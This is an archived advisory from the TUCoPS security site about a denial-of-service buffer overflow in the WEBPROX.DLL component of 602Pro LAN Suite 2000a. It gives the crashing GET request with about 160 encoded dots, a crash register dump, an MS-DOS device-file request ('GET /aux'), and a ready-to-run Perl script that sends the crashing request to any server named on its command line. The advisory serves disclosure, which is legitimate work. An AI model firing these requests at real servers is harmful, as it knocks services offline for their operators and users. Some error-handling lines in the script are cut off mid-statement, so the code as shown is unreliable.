Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Windows Net Apps :: 602lsw2.htm

602Pro LAN Suite WEBPROX.DLL Buffer Overflow

    602Pro Lansuite


    602Pro Lansuite 2000a 1.0.34 - prior


    'nitr0s' found following.   There are 2  problems, the first  is a
    buffer  overflow  in  WEBPROX.DLL  and  the  other  in relation to
    MS-DOS device  files.Credit should  be given  to Peter  Grundl who
    made nitr0s  think of  trying this  same problem  that he found in
    Alt-N  Technologies  MDaemon  WebConfiguration  feature which also
    affects Xitami Webserver 2.4b5 and probably a whole load of  other
    windows server programs.

    Connect to the webserver and send the following request:

        GET /%2e%2e%2e%2e.... /HTTP/1.0

    Where %2e is over 157 times

    The server depending  on how many  times %2e or  [.] is sent  will
    exit displaying the following error:

        LANSUITE caused an invalid page fault in
        module WEBPROX.DLL at 015f:008a1326.
        EAX=0000000a CS=015f EIP=008a1326
        EBX=00000008 SS=0167 ESP=05202848
        ECX=0000000a DS=0167 ESI=81648e38 FS=2c37
        EDX=334f2b1f ES=0167 EDI=81623ff0 GS=0000
        Bytes at CS:EIP:
        8b 48 2c 83 e1 01 85 c9 74 2d 8b 55 08 c7 42 18
        Stack dump:
        052029dc 00862e9a 0000000a 334f2b1f 000000fa
        81623ff0 81648e38 00000008 bff7b317 018d0000
        00000000 018d1650 018d1650 0520ace7 018d164c

    The  other  problem  is  requesting  MS-DOS device files, send the
    following request to the webserver on port 80

        GET /aux

    The code:

    # 602Pro Lansuite 2000a 1.0.34 Denial Of Service
    # Malformed GET request
    use Getopt::Std;
    use Socket;
    getopts('s:', \%args);
    $foo = "%2e";
    $number = "160";
    $data .= $foo x $number;
    $serv = $args{s};
    $port =  80;
    $buf = "GET /$data /HTTP/1.0\r\n\r\n";
    $in_addr = (gethostbyname($serv))[4] || die("Error: $!
    $paddr = sockaddr_in($port, $in_addr) || die ("Error: $!
    $proto = getprotobyname('tcp') || die("Error: $!\n");
    socket(S, PF_INET, SOCK_STREAM, $proto) || die
    ("Error: $!");
    connect(S, $paddr) ||die ("Error: $!");
    select(S); $| = 1; select(STDOUT);
    print S "$buf";
    print("Data has been successfully sent to $serv\n");
    sub usage {die("\n\n$0 -s <server>\n\n");}


    Not sure what build nitr0s tried, but something similar was  found
    in the past so please take a look at:

    As for second  problem, that one  is OS related.   Filtering could
    help here anyway.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH